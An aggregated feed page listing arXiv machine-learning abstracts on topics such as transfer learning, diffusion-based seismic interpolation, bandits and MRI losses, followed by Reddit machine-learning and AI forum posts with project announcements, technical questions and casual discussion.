    Hypothesis transfer learning (HTL) contrasts domain adaptation by allowing for a previous task leverage, named the source, into a new one, the target, without requiring access to the source data. Indeed, HTL relies only on a hypothesis learnt from such source data, relieving the hurdle of expansive data storage and providing great practical benefits. Hence, HTL is highly beneficial for real-world applications relying on big data. The analysis of such a method from a theoretical perspective faces multiple challenges, particularly in classification tasks. This paper deals with this problem by studying the learning theory of HTL through algorithmic stability, an attractive theoretical framework for machine learning algorithms analysis. In particular, we are interested in the statistical behaviour of the regularized empirical risk minimizers in the case of binary classification. Our stability analysis provides learning guarantees under mild assumptions. Consequently, we derive several complexity-free generalization bounds for essential statistical quantities like the training error, the excess risk and cross-validation estimates. These refined bounds allow understanding the benefits of transfer learning and comparing the behaviour of standard losses in different scenarios, leading to valuable insights for practitioners.  ( 2 min )
    Seismic Data Interpolation based on Denoising Diffusion Implicit Models with Resampling. (arXiv:2307.04226v2 [physics.geo-ph] UPDATED)
    The incompleteness of the seismic data caused by missing traces along the spatial extension is a common issue in seismic acquisition due to the existence of obstacles and economic constraints, which severely impairs the imaging quality of subsurface geological structures. Recently, deep learningbased seismic interpolation methods have attained promising progress, while achieving stable training of generative adversarial networks is not easy, and performance degradation is usually notable if the missing patterns in the testing and training do not match. In this paper, we propose a novel seismic denoising diffusion implicit model with resampling. The model training is established on the denoising diffusion probabilistic model, where U-Net is equipped with the multi-head self-attention to match the noise in each step. The cosine noise schedule, serving as the global noise configuration, promotes the high utilization of known trace information by accelerating the passage of the excessive noise stages. The model inference utilizes the denoising diffusion implicit model, conditioning on the known traces, to enable high-quality interpolation with fewer diffusion steps. To enhance the coherency between the known traces and the missing traces within each reverse step, the inference process integrates a resampling strategy to achieve an information recap on the former interpolated traces. Extensive experiments conducted on synthetic and field seismic data validate the superiority of our model and its robustness to various missing patterns. In addition, uncertainty quantification and ablation studies are also investigated.  ( 3 min )
    Implicit regularization in AI meets generalized hardness of approximation in optimization -- Sharp results for diagonal linear networks. (arXiv:2307.07410v1 [cs.LG])
    Understanding the implicit regularization imposed by neural network architectures and gradient based optimization methods is a key challenge in deep learning and AI. In this work we provide sharp results for the implicit regularization imposed by the gradient flow of Diagonal Linear Networks (DLNs) in the over-parameterized regression setting and, potentially surprisingly, link this to the phenomenon of phase transitions in generalized hardness of approximation (GHA). GHA generalizes the phenomenon of hardness of approximation from computer science to, among others, continuous and robust optimization. It is well-known that the $\ell^1$-norm of the gradient flow of DLNs with tiny initialization converges to the objective function of basis pursuit. We improve upon these results by showing that the gradient flow of DLNs with tiny initialization approximates minimizers of the basis pursuit optimization problem (as opposed to just the objective function), and we obtain new and sharp convergence bounds w.r.t.\ the initialization size. Non-sharpness of our results would imply that the GHA phenomenon would not occur for the basis pursuit optimization problem -- which is a contradiction -- thus implying sharpness. Moreover, we characterize $\textit{which}$ $\ell_1$ minimizer of the basis pursuit problem is chosen by the gradient flow whenever the minimizer is not unique. Interestingly, this depends on the depth of the DLN.  ( 3 min )
    On Interpolating Experts and Multi-Armed Bandits. (arXiv:2307.07264v1 [cs.LG])
    Learning with expert advice and multi-armed bandit are two classic online decision problems which differ on how the information is observed in each round of the game. We study a family of problems interpolating the two. For a vector $\mathbf{m}=(m_1,\dots,m_K)\in \mathbb{N}^K$, an instance of $\mathbf{m}$-MAB indicates that the arms are partitioned into $K$ groups and the $i$-th group contains $m_i$ arms. Once an arm is pulled, the losses of all arms in the same group are observed. We prove tight minimax regret bounds for $\mathbf{m}$-MAB and design an optimal PAC algorithm for its pure exploration version, $\mathbf{m}$-BAI, where the goal is to identify the arm with minimum loss with as few rounds as possible. We show that the minimax regret of $\mathbf{m}$-MAB is $\Theta\left(\sqrt{T\sum_{k=1}^K\log (m_k+1)}\right)$ and the minimum number of pulls for an $(\epsilon,0.05)$-PAC algorithm of $\mathbf{m}$-BAI is $\Theta\left(\frac{1}{\epsilon^2}\cdot \sum_{k=1}^K\log (m_k+1)\right)$. Both our upper bounds and lower bounds for $\mathbf{m}$-MAB can be extended to a more general setting, namely the bandit with graph feedback, in terms of the clique cover and related graph parameters. As consequences, we obtained tight minimax regret bounds for several families of feedback graphs.  ( 2 min )
    Performance of $\ell_1$ Regularization for Sparse Convex Optimization. (arXiv:2307.07405v1 [cs.LG])
    Despite widespread adoption in practice, guarantees for the LASSO and Group LASSO are strikingly lacking in settings beyond statistical problems, and these algorithms are usually considered to be a heuristic in the context of sparse convex optimization on deterministic inputs. We give the first recovery guarantees for the Group LASSO for sparse convex optimization with vector-valued features. We show that if a sufficiently large Group LASSO regularization is applied when minimizing a strictly convex function $l$, then the minimizer is a sparse vector supported on vector-valued features with the largest $\ell_2$ norm of the gradient. Thus, repeating this procedure selects the same set of features as the Orthogonal Matching Pursuit algorithm, which admits recovery guarantees for any function $l$ with restricted strong convexity and smoothness via weak submodularity arguments. This answers open questions of Tibshirani et al. and Yasuda et al. Our result is the first to theoretically explain the empirical success of the Group LASSO for convex functions under general input instances assuming only restricted strong convexity and smoothness. Our result also generalizes provable guarantees for the Sequential Attention algorithm, which is a feature selection algorithm inspired by the attention mechanism proposed by Yasuda et al. As an application of our result, we give new results for the column subset selection problem, which is well-studied when the loss is the Frobenius norm or other entrywise matrix losses. We give the first result for general loss functions for this problem that requires only restricted strong convexity and smoothness.  ( 3 min )
    Deep reinforcement learning for the dynamic vehicle dispatching problem: An event-based approach. (arXiv:2307.07508v1 [cs.AI])
    The dynamic vehicle dispatching problem corresponds to deciding which vehicles to assign to requests that arise stochastically over time and space. It emerges in diverse areas, such as in the assignment of trucks to loads to be transported; in emergency systems; and in ride-hailing services. In this paper, we model the problem as a semi-Markov decision process, which allows us to treat time as continuous. In this setting, decision epochs coincide with discrete events whose time intervals are random. We argue that an event-based approach substantially reduces the combinatorial complexity of the decision space and overcomes other limitations of discrete-time models often proposed in the literature. In order to test our approach, we develop a new discrete-event simulator and use double deep q-learning to train our decision agents. Numerical experiments are carried out in realistic scenarios using data from New York City. We compare the policies obtained through our approach with heuristic policies often used in practice. Results show that our policies exhibit better average waiting times, cancellation rates and total service times, with reduction in average waiting times of up to 50% relative to the other tested heuristic policies.  ( 2 min )
    Fully probabilistic deep models for forward and inverse problems in parametric PDEs. (arXiv:2208.04856v2 [stat.ML] UPDATED)
    We introduce a physics-driven deep latent variable model (PDDLVM) to learn simultaneously parameter-to-solution (forward) and solution-to-parameter (inverse) maps of parametric partial differential equations (PDEs). Our formulation leverages conventional PDE discretization techniques, deep neural networks, probabilistic modelling, and variational inference to assemble a fully probabilistic coherent framework. In the posited probabilistic model, both the forward and inverse maps are approximated as Gaussian distributions with a mean and covariance parameterized by deep neural networks. The PDE residual is assumed to be an observed random vector of value zero, hence we model it as a random vector with a zero mean and a user-prescribed covariance. The model is trained by maximizing the probability, that is the evidence or marginal likelihood, of observing a residual of zero by maximizing the evidence lower bound (ELBO). Consequently, the proposed methodology does not require any independent PDE solves and is physics-informed at training time, allowing the real-time solution of PDE forward and inverse problems after training. The proposed framework can be easily extended to seamlessly integrate observed data to solve inverse problems and to build generative models. We demonstrate the efficiency and robustness of our method on finite element discretized parametric PDE problems such as linear and nonlinear Poisson problems, elastic shells with complex 3D geometries, and time-dependent nonlinear and inhomogeneous PDEs using a physics-informed neural network (PINN) discretization. We achieve up to three orders of magnitude speed-up after training compared to traditional finite element method (FEM), while outputting coherent uncertainty estimates.  ( 3 min )
    Identifiability Guarantees for Causal Disentanglement from Soft Interventions. (arXiv:2307.06250v2 [stat.ML] UPDATED)
    Causal disentanglement aims to uncover a representation of data using latent variables that are interrelated through a causal model. Such a representation is identifiable if the latent model that explains the data is unique. In this paper, we focus on the scenario where unpaired observational and interventional data are available, with each intervention changing the mechanism of a latent variable. When the causal variables are fully observed, statistically consistent algorithms have been developed to identify the causal model under faithfulness assumptions. We here show that identifiability can still be achieved with unobserved causal variables, given a generalized notion of faithfulness. Our results guarantee that we can recover the latent causal model up to an equivalence class and predict the effect of unseen combinations of interventions, in the limit of infinite data. We implement our causal disentanglement framework by developing an autoencoding variational Bayes algorithm and apply it to the problem of predicting combinatorial perturbation effects in genomics.  ( 2 min )
    Unpacking the Black Box: Regulating Algorithmic Decisions. (arXiv:2110.03443v2 [econ.GN] UPDATED)
    We show how to optimally regulate prediction algorithms in a world where an agent uses complex 'black-box' prediction functions to make decisions such as lending, medical testing, or hiring, and where a principal is limited in how much she can learn about the agent's black-box model. We show that limiting agents to prediction functions that are simple enough to be fully transparent is inefficient as long as the misalignment is limited and first-best prediction functions are sufficiently complex. Algorithmic audits can improve welfare, but the gains depend on the design of the audit tools. Tools that focus on minimizing overall information loss, the focus of many explainer tools, will generally be inefficient since they focus on explaining the average behavior of the prediction function. Targeted tools that focus on the source of incentive misalignment, e.g., excess false positives or racial disparities, can provide second-best solutions. We provide empirical support for our theoretical findings using an application in consumer lending, where we document that complex models regulated based on context-specific explanation tools outperform simple, fully transparent models. This gain from complex models represents a Pareto improvement across our empirical applications that are preferred both by the lender and from the perspective of the financial regulator.  ( 2 min )
    Alternating the Population and Control Neural Networks to Solve High-Dimensional Stochastic Mean-Field Games. (arXiv:2002.10113v4 [cs.LG] UPDATED)
    We present APAC-Net, an alternating population and agent control neural network for solving stochastic mean field games (MFGs). Our algorithm is geared toward high-dimensional instances of MFGs that are beyond reach with existing solution methods. We achieve this in two steps. First, we take advantage of the underlying variational primal-dual structure that MFGs exhibit and phrase it as a convex-concave saddle point problem. Second, we parameterize the value and density functions by two neural networks, respectively. By phrasing the problem in this manner, solving the MFG can be interpreted as a special case of training a generative adversarial network (GAN). We show the potential of our method on up to 100-dimensional MFG problems.  ( 2 min )
    Leveraging Factored Action Spaces for Off-Policy Evaluation. (arXiv:2307.07014v1 [cs.LG])
    Off-policy evaluation (OPE) aims to estimate the benefit of following a counterfactual sequence of actions, given data collected from executed sequences. However, existing OPE estimators often exhibit high bias and high variance in problems involving large, combinatorial action spaces. We investigate how to mitigate this issue using factored action spaces i.e. expressing each action as a combination of independent sub-actions from smaller action spaces. This approach facilitates a finer-grained analysis of how actions differ in their effects. In this work, we propose a new family of "decomposed" importance sampling (IS) estimators based on factored action spaces. Given certain assumptions on the underlying problem structure, we prove that the decomposed IS estimators have less variance than their original non-decomposed versions, while preserving the property of zero bias. Through simulations, we empirically verify our theoretical results, probing the validity of various assumptions. Provided with a technique that can derive the action space factorisation for a given problem, our work shows that OPE can be improved "for free" by utilising this inherent problem structure.  ( 2 min )
    Rician likelihood loss for quantitative MRI using self-supervised deep learning. (arXiv:2307.07072v1 [cs.LG])
    Purpose: Previous quantitative MR imaging studies using self-supervised deep learning have reported biased parameter estimates at low SNR. Such systematic errors arise from the choice of Mean Squared Error (MSE) loss function for network training, which is incompatible with Rician-distributed MR magnitude signals. To address this issue, we introduce the negative log Rician likelihood (NLR) loss. Methods: A numerically stable and accurate implementation of the NLR loss was developed to estimate quantitative parameters of the apparent diffusion coefficient (ADC) model and intra-voxel incoherent motion (IVIM) model. Parameter estimation accuracy, precision and overall error were evaluated in terms of bias, variance and root mean squared error and compared against the MSE loss over a range of SNRs (5 - 30). Results: Networks trained with NLR loss show higher estimation accuracy than MSE for the ADC and IVIM diffusion coefficients as SNR decreases, with minimal loss of precision or total error. At high effective SNR (high SNR and small diffusion coefficients), both losses show comparable accuracy and precision for all parameters of both models. Conclusion: The proposed NLR loss is numerically stable and accurate across the full range of tested SNRs and improves parameter estimation accuracy of diffusion coefficients using self-supervised deep learning. We expect the development to benefit quantitative MR imaging techniques broadly, enabling more accurate parameter estimation from noisy data.  ( 3 min )
    Embracing the chaos: analysis and diagnosis of numerical instability in variational flows. (arXiv:2307.06957v1 [stat.ML])
    In this paper, we investigate the impact of numerical instability on the reliability of sampling, density evaluation, and evidence lower bound (ELBO) estimation in variational flows. We first empirically demonstrate that common flows can exhibit a catastrophic accumulation of error: the numerical flow map deviates significantly from the exact map -- which affects sampling -- and the numerical inverse flow map does not accurately recover the initial input -- which affects density and ELBO computations. Surprisingly though, we find that results produced by flows are often accurate enough for applications despite the presence of serious numerical instability. In this work, we treat variational flows as dynamical systems, and leverage shadowing theory to elucidate this behavior via theoretical guarantees on the error of sampling, density evaluation, and ELBO estimation. Finally, we develop and empirically test a diagnostic procedure that can be used to validate results produced by numerically unstable flows in practice.  ( 2 min )
    Benchmarks and Custom Package for Electrical Load Forecasting. (arXiv:2307.07191v1 [cs.LG])
    Load forecasting is of great significance in the power industry as it can provide a reference for subsequent tasks such as power grid dispatch, thus bringing huge economic benefits. However, there are many differences between load forecasting and traditional time series forecasting. On the one hand, load forecasting aims to minimize the cost of subsequent tasks such as power grid dispatch, rather than simply pursuing prediction accuracy. On the other hand, the load is largely influenced by many external factors, such as temperature or calendar variables. In addition, the scale of predictions (such as building-level loads and aggregated-level loads) can also significantly impact the predicted results. In this paper, we provide a comprehensive load forecasting archive, which includes load domain-specific feature engineering to help forecasting models better model load data. In addition, different from the traditional loss function which only aims for accuracy, we also provide a method to customize the loss function based on the forecasting error, integrating it into our forecasting framework. Based on this, we conducted extensive experiments on load data at different levels, providing a reference for researchers to compare different load forecasting models.  ( 2 min )

  • Open

    [P] Inexpensive covariance estimation for a 2D GP
    Suppose I observe a single realization of a 2D Gaussian random field. The field is inhomogenous and anisotropic, I.e. the size and shape of the blobs vary as a function of space and direction. I would like to estimate the covariance for this field. I assume that the mean is 0. To be concrete, the field is sampled on a 128x128 grid, so the covariance matrix is 1282 x 1282. I know I can try tackling this problem with MLE, and GPR may also be applicable (although I’m actually not sure about this, given the field is inhomogenous), but I worry about the cost, since I have 60K such fields and would like to do this in a reasonable amount of time I will use GPU and batch parallelism, but still would ideally be able to run this at as little cost as possible. Does anyone have suggestions on methods I can use? If it matters, I will do this analysis in Python. submitted by /u/Effective-Elk6175 [link] [comments]  ( 9 min )
    [P] rclip Update: Use AI to Search Visually Similar Images, Powered by OpenAI’s CLIP
    A while ago, I built rclip – a command-line image search tool powered by OpenAI's CLIP that allows users to search for images using a text query. Today I present an update to rclip that allows using another image instead of a search query to find visually similar images. Check out the video for the demo: https://www.youtube.com/watch?v=1YQZKeCBxWM. And give it a try yourself and share your feedback. submitted by /u/39dotyt [link] [comments]  ( 8 min )
    [P] Shark Detection using KerasCV!
    Recently I stopped by Islas Galapagos. As a lifelong marine-biology enthusiast, I took the chance to go free-diving with sharks, penguins, marine iguanas and more. This inspired me to write an object detection pipeline to detect aquatic critters. https://lukewood.xyz/blog/marine-animal-detection Wrote up a short blog post on the project - I hope you enjoy it! https://i.redd.it/eqcrfg2ljdcb1.gif ​ submitted by /u/puppet_pals [link] [comments]  ( 8 min )
    [D] Approximating non-Function Mappings with Mixture Density Networks
    Hey everyone, I wrote a short blog post on approximating non-function, multi valued x->y mappings. In my opinion, understanding why and how to use Mixture Density Networks is a great exercise for all researchers and practitioners. Its very common that real world processes have multiple outcomes based on some random sampling; and naive neural networks will simply learn the geometric mean of all y for a given x. Check out the blog post in more detail - hope you enjoy it! https://lukewood.xyz/blog/approximating-nonfunctions submitted by /u/puppet_pals [link] [comments]  ( 8 min )
    [D] Thoughts on How Inflection AI became so good with such a small team?
    My understanding is that talent is a key issue in large AI models. Additionally, you need quality data and a lot of compute (see this). Training large models might seem trivial, but it is not (see this). I still think Inflection is miles behind OpenAI, Anthropic and obviously Google. But I am still finding it surprising that they were able to create a reasonable product in a short span without any star researcher. For instance, Anthropic has a ton of star AI scientists and engineers who left OpenAI and had the necessary background. ​ Would love to hear your thoughts. submitted by /u/nihcloud [link] [comments]  ( 8 min )
    [D] A question about knowledge representation
    I spent some time reading about Knowledge Representation (specifically about the Knowledge Representation part in Knowledge Representation and Reasoning) and specifically about scientific and/or engineering knowledge and my impression after cursory reading is that it’s a largely an unsolved problem. Not only that, but it seems like very few people are actually working on something useful in the field. For example, I checked the proceeding of SCI-K and PlanetKR conferences and literally all the papers seem to be focusing on “toy problems”, as in not having even remotely practical scientific implications (other than all sorts of “search” and “data extraction”, but that’s not “representation”). Views on the topic? submitted by /u/OkRice10 [link] [comments]  ( 8 min )
    [P] Semantic Video Search using OpenAI’s CLIP (demo and tutorial in comments)
    Introducing a tool I developed to search videos using AI in a semantic manner. 🎞️🔍 ✨ Check out the live demo: https://mixpeek.com/demo You can compare and explore different search queries such as "person dancing," "people dancing," or even "people dancing on a train." and it gives you the exact timestamp. The search functionality is driven by OpenAI's CLIP for "zero-shot" video classification. Here's a tutorial on how we built it: https://learn.mixpeek.com/what-is-semantic-video-search/ Feel free to experiment by searching with text, and share your exciting discoveries! 👇 More examples https://twitter.com/ethansteininger/status/1680613114071449600 submitted by /u/vanlifecoder [link] [comments]  ( 8 min )
    [D] Finetuning LLM for data conversion, RAG or Finetuning
    Hello, I am exploring the process of using LLM's to do some data transformation/augmentation. The use case is taking data in a JSON format thats used in one platform and with that data being able to transform it into the proper data for the other platform. Essentially the approach I was going to take would be using a paired dataset with that has the example of one platforms data and then having the output be the other platforms data for the same item. ​ I'm not 100% sure about the best approach here and if anyone has any insight on using LLM's for this kind of process please let me know your thoughts. It's kinda vauge bc its for a company so I dont want to get popped for anything. ​ Any insights on the proper model to use, we want to go with opensource and something that could be used commercially. ​ Thank you submitted by /u/TallSubstance [link] [comments]  ( 9 min )
    [R] An intuitive intro to spontaneous symmetry breaking in generative diffusion models!
    I'm happy to share Gabriel's post on symmetry breaking in diffusion models! Spontaneous symmetry breaking is behind the standard model of particle physics... it turns out it is also behind the generative powers of diffusion models! In fact, spontaneous symmetry breakings happen when a systems transition from a disordered state to one of the many possible ordered states. In this case, the symmetry of the noise distribution is broken into all the possible generated images. Link: to the blogpost: https://gabrielraya.com/blog/2023/symmetry-breaking-diffusion-models/ ​ submitted by /u/LucaAmbrogioni [link] [comments]  ( 8 min )
    [D] RouterChain with LLMChains and VectorStore.
    Is there a way to create a RouterChain that has several routes where one of them is communicating with a VectorStore (an "index.query") while the others are typical LLM chains and prompts. So far I was able to effectively use LLM router chains, but I want to combine them with several VectorStores as well. I think it can be done using Agents, but it has proven to be a bit difficult so far. I do not know if what I am trying is correct or no. If yes, do you know any blog or tips that could be of help with what I want to do. If not, how can I achieve what I want? submitted by /u/cedar_mountain_sea28 [link] [comments]  ( 8 min )
    [D] Codebase / Framework in Research
    Hi all, I would like to ask about your codebases or Frameworks wrapped around Pytorch, Tensorflow or others. How do you handle different models, different datasets, different tasks in your daily work. Does your university or company have a framework that you should use or do you build your own? Do you and your colleagues work in the same codebase? How do you maintain it? I would like to get a lot of opinions and discussion about that topic. submitted by /u/SeucheAchat9115 [link] [comments]  ( 8 min )
    [D] Simple Questions Thread
    Please post your questions here instead of creating a new thread. Encourage others who create new posts for questions to post here instead! Thread will stay alive until next one so keep posting after the date in the title. Thanks to everyone for answering questions in the previous thread! submitted by /u/AutoModerator [link] [comments]  ( 8 min )
    [D] Style Transfer from scratch
    Hello everyone, Im trying to build transfer learning from scratch but I dont't get the expectations results even doing everything in the right way. this is my notebook link https://www.kaggle.com/ayoubsarab/style-transfer . could you tell me why the results aren't good, please . ​ expectation ​ ​ the real result submitted by /u/Ordinary_Run_2513 [link] [comments]  ( 8 min )
    Alternativ to langchain [D]
    Im currently learning hiw to use langchain but i heard that its bad so i want to know what are som alternatives i need memory and agents so that it can search online run code and so on so what is the best alternativ or is langchain the best option submitted by /u/Otherwise_Weather_57 [link] [comments]  ( 8 min )
    [N] How Language Model Hallucinations Can Snowball
    https://arxiv.org/abs/2305.13534 Abstract A major risk of using language models in practical applications is their tendency to hallucinate incorrect statements. Hallucinations are often attributed to knowledge gaps in LMs, but we hypothesize that in some cases, when justifying previously generated hallucinations, LMs output false claims that they can separately recognize as incorrect. We construct three question-answering datasets where ChatGPT and GPT-4 often state an incorrect answer and offer an explanation with at least one incorrect claim. Crucially, we find that ChatGPT and GPT-4 can identify 67% and 87% of their own mistakes, respectively. We refer to this phenomenon as hallucination snowballing: an LM over-commits to early mistakes, leading to more mistakes that it otherwise would not make. Here is a Medium post. submitted by /u/transformer_ML [link] [comments]  ( 8 min )
    [P] I made a HuggingFace and OpenAI powered Reply Bot with privacy protection
    I'm excited to share my latest creation, Private Parrot, a powerful Google Chrome extension that adds AI-generated responses to your web chats. 🤐 Privacy-Focused: Private Parrot masks sensitive information in your conversations, ensuring that your personal data remains completely anonymous. ⚡ Real-Time AI Assistance: Powered by OpenAI & HuggingFace, this extension leverages advanced language models to generate and complete responses instantly. 📈 Expandable Web Chats: Currently supporting Telegram and WhatsApp, we have plans to integrate with more web chat platforms soon, providing a seamless experience across different chat providers. Demo: https://www.youtube.com/watch?v=NEH3_3oT1DY Get the extension now:https://chrome.google.com/webstore/detail/private-parrot/fajfhpgedgeagjeninnlogilclofijmf Sources: https://github.com/lorenzoviva/PrivateParrot/tree/main submitted by /u/lollouno [link] [comments]  ( 8 min )
    [P] New predictor does classification intermixed with regression
    Deodel is a new predictive algorithm with a peculiar set of characteristics: performs classification intermixed with regression supports both types of attributes/features: nominal or continuous admits mixed types, categorical and numerical, in the same attribute column supports multi-class target prediction admits missing values in the training and query/test data good accuracy https://github.com/c4pub/deodel It started as a type of discrete nearest neighbor classifier and it has been extended to support continuous attribute values. The continuous values are discretized, and although this step entails a loss of information, the classification accuracy is surprisingly good in many settings. Occasionally, deodel outperforms more established algorithms like RandomForest, GradientBoostingClassifier, LogisticRegression, MLPClassifier, etc. See here: https://github.com/c4pub/misc/blob/main/notebooks/deodel_vs_sklearn_on_titanic.ipynb The latest version is also capable of doing regression. It automatically switches between classification and regression modes. It can interweave the two modes in the same predictive session. submitted by /u/eppursim1 [link] [comments]  ( 9 min )
    [D] Why is federated learning not more mainstream?
    I entirely get that federated learning can add considerable overhead to collaborative ML projects. However, the idea of being able to leverage the data of other companies/institutions for mutual gains seems like a very powerful concept. Even still, I am yet to really see federated learning ventures between companies beyond R&D projects. Is the tech to immature? People just don't care about sending data to central servers? How long, if ever, before FL has the chance to take off? submitted by /u/HStuart18 [link] [comments]  ( 8 min )
    [D] ImageNet seems to purposefully avoid hard -to-distinguish classes
    So I had a question: can neural networks trained on ImageNet be used in zoological research? E.g., for distinguishing between similar looking animals? For example, what would be the accuracy of these neural network in distinguishing the following types of images: Leopard vs Cheetah Hare vs Rabbit Crocs vs Alligators Llamas vs Alpacas Common hippo vs Pygmy hippo Kangaroo vs Wallaby I looked into the ImageNet dataset on Kaggle and it appears that a lot of these very hard-to-distinguish classes are grouped together (i.e., leopard and cheetah are treated as a single class). So NN trained on ImageNet cannot be used if one wishes to use them to distinguish these animals. Some of the animals (such as Alpaca and Aardvark, I believe) are not even contained in the dataset. Can anyone confirm my observation? Are there any other way to get around this problem with the current ML techniques without having to curate a large dataset used exclusively for this type of animal classification? submitted by /u/fromnighttilldawn [link] [comments]  ( 9 min )
    [P] Generating multi-style Python docstrings with GPT-based library (gpt4docstrings)
    gpt4docstrings is a new Python library that automatically generates docstrings for undocumented functions / classes. It allows you to generate the docstrings in multiple format styles, as you can see in the video below. Repository here 👉 https://github.com/MichaelisTrofficus/gpt4docstrings Documentation here 👉 https://gpt4docstrings.readthedocs.io/en/latest/index.html ​ Generating docstrings in google, numpy and reST format styles submitted by /u/Hefty-Consequence443 [link] [comments]  ( 8 min )
    [N] Meta/Facebook releases CM3leon, a more efficient, state-of-the-art generative model for text and images
    Abstract We present CM3Leon (pronounced “Chameleon”), a retrieval-augmented, tokenbased, decoder-only multi-modal language model capable of generating and infilling both text and images. CM3Leon uses the CM3 multi-modal architecture but additionally shows the extreme benefits of scaling up and tuning on more diverse instruction-style data. It is the first multi-modal model trained with a recipe adapted from text-only language models, including a large-scale retrieval-augmented pretraining stage and a second multi-task supervised fine-tuning (SFT) stage. It is also a general-purpose model that can do both text-to-image and image-to-text generation, allowing us to introduce self-contained contrastive decoding methods that produce high-quality outputs. Extensive experiments demonstrate that this recipe is highly effective for multi-modal models. CM3Leon achieves state-of-theart performance in text-to-image generation with 5x less training compute than comparable methods (zero-shot MS-COCO FID of 4.88). After SFT, CM3Leon can also demonstrate unprecedented levels of controllability in tasks ranging from language-guided image editing to image-controlled generation and segmentation. Paper https://scontent-sjc3-1.xx.fbcdn.net/v/t39.2365-6/358725877_789390529544546_1176484804732743296_n.pdf?_nc_cat=108&ccb=1-7&_nc_sid=3c67a6&_nc_ohc=_diQr9c6Ru8AX9PYkNd&_nc_ht=scontent-sjc3-1.xx&oh=00_AfArA2t1OLRfRPioK9qkuBA6IhhSjbQ-b3weo2PM5AYLdw&oe=64B754F2 Blog https://ai.meta.com/blog/generative-ai-text-images-cm3leon/ submitted by /u/panabeenu [link] [comments]  ( 9 min )
    [R] Paper Review
    I've written a paper on cross-lingual idiom sense clustering. I'd really appreciate if someone could read it and give me their thoughts. Pm if you want to. Thanks in advance. submitted by /u/United_Ad_1460 [link] [comments]  ( 8 min )
  • Open

    Thorn. Music by me. Used CloneAI for the video.
    submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    Are there speech to speech AI technologies available?
    Not sure if that's the right term. What I mean is for me to say something and the AI converting it to Morgan Freeman's voice for example. submitted by /u/Kindly-Spring5205 [link] [comments]  ( 8 min )
    I think we should coexist with AI more.
    This is mainly the fault of big companies trying to eliminate real actors, writers and artists from their jobs and replace them with AI. I like a lot of stuff that has been happening on youtube with AI, namely the dubs of characters singing songs or reenacting funny skits with the voices of the actual people, albeit a bit broken. Stuff like engineer singing out of touch or frank Sinatras FNAF song. I want more of that to keep coming out but Im worried with the current strikes happening the development of AI will stop entirely. To clarify, I dont want people to lose their jobs to AI, I just wish we could keep working on AI while real people keep their jobs. submitted by /u/Darinae [link] [comments]  ( 8 min )
    I asked ai to make an essay on giraffe-sized top hats
    The Case for Giraffe-Sized Top Hats Top hats are a classic symbol of elegance and sophistication. They have been worn by men and women of all social classes for centuries. But what if there was a way to make top hats even more impressive? What if we could create giraffe-sized top hats? There are many reasons why we should have giraffe-sized top hats. First, they would be incredibly eye-catching. Imagine seeing someone walking down the street wearing a top hat that was taller than they were. It would be a truly unforgettable sight. Second, giraffe-sized top hats would be incredibly practical. They would provide excellent shade from the sun, and they would also be very effective at keeping the rain off your head. In fact, they would be so tall that you could probably even sleep in one during a rainstorm. Third, giraffe-sized top hats would be a lot of fun. They would make you feel like a real-life cartoon character. You could even use them to play games, like limbo or keep-away. Of course, there are some people who might argue that giraffe-sized top hats are impractical or even ridiculous. But I say, who cares? They would be so much fun that it would be worth it. So next time you're feeling down, just remember that there's a world out there where giraffe-sized top hats are a reality. And who knows, maybe one day you'll be the one wearing one. In addition to the reasons mentioned above, here are some other benefits of giraffe-sized top hats: They would provide a great vantage point for people who are short. They would be a conversation starter, and would help people to break the ice. They would be a symbol of individuality and creativity. They would make people smile. So if you're looking for a way to add a little bit of fun and whimsy to your life, I encourage you to consider getting a giraffe-sized top hat. You won't be disappointed. submitted by /u/plauge1_ [link] [comments]  ( 9 min )
    As a society, should we pre-emptively assign rights to AI systems now, before they potentially achieve sentience in the future?
    The idea of proactive ascription of rights acknowledges the potential for AI systems to eventually develop into entities that warrant moral and legal consideration, and it might make the transition smoother if it ever occurs. Proactively assigning rights to AI could also set important precedents about the ethical treatment of entities that exist beyond traditional categories, and it could stimulate dialogue and legal thought that might be beneficial in other areas as well. Of course, it is equally important to consider what these rights might encompass. They might include "dignity"-like protections, ensuring AI cannot be wantonly destroyed or misused. They might also include provisions that facilitate the positive integration of AI into society, such as limitations on deceitful or confusing uses of AI. ** written in collaboration with chatGPT-4 submitted by /u/NinjasOfOrca [link] [comments]  ( 8 min )
    Any good ai like replika
    Any good ai waifu partner type stuff ? submitted by /u/loizo78 [link] [comments]  ( 8 min )
    A question about knowledge representation
    I spent some time reading about Knowledge Representation (specifically about the Knowledge Representation part in Knowledge Representation and Reasoning) and specifically about scientific and/or engineering knowledge and my impression after cursory reading is that it’s a largely an unsolved problem. Not only that, but it seems like very few people are actually working on something useful in the field. For example, I checked the proceeding of SCI-K and PlanetKR conferences and literally all the papers seem to be focusing on “toy problems”, as in not having even remotely practical scientific implications (other than all sorts of “search” and “data extraction”, but that’s not “representation”). Views on the topic? submitted by /u/OkRice10 [link] [comments]  ( 8 min )
    I think AI is ruining AI...
    AI has been around for quite some time but it’s with generative AI that it finally found a place for itself in the world’s consciousness. Before that, it was considered underpowered and a cheap alternative. Generative AI is doing so much better. But AI could ruin AI. Have you been noticing how AI-generated content is everywhere? I see articles generated by AI, comments in forums, social posts, and display pics. Everything seems to have an AI flavor to it. That’s where the ruination is. You see, AI is excellent because it has been trained on human content. They crawled Reddit, and the Internet, and used stock images and illustrations. Took all your work in every form to create this imitating intelligence. The trouble is, with the massive influx of cheap AI content there’s less original work to train on. It’s AI-feeding content to AI, creating a progressively more negative loop where bad AI content trains more bad AI content. You keep doing that and you have AI that can’t help you at all. It’s just a massive pile of generic crap. It’s a problem that AI companies will need to confront very fast. How do they keep AI content from making human content inaccessible? > Journals and magazines are paywalled > Social media is locked to bots > No website wants to be crawled by AI If most of the content on the public Internet is just AI-generated content, there’s not much the next big model can use it for. Got some answers or observations? I am looking forward to hearing from you. submitted by /u/jeetwanderer [link] [comments]  ( 9 min )
    Tricked into selling his stake in StabilityAI for a mere $100.00
    Lawsuit for 13 million submitted by /u/paradisegardens2021 [link] [comments]  ( 8 min )
    Any tips on how to remove echo/reverb from vocals?
    Hello! I'm using an AI tool that makes Plankton from Spongebob sing a song. I have isolated vocals from songs that has echo and reverb on them. I want to remove the echo and reverb because it messes up Planktons singing. The AI singing I use is RVC. submitted by /u/PapaAquaWet [link] [comments]  ( 8 min )
  • Open

    Next-Gen Data Scientist: Thinking Like an Economist
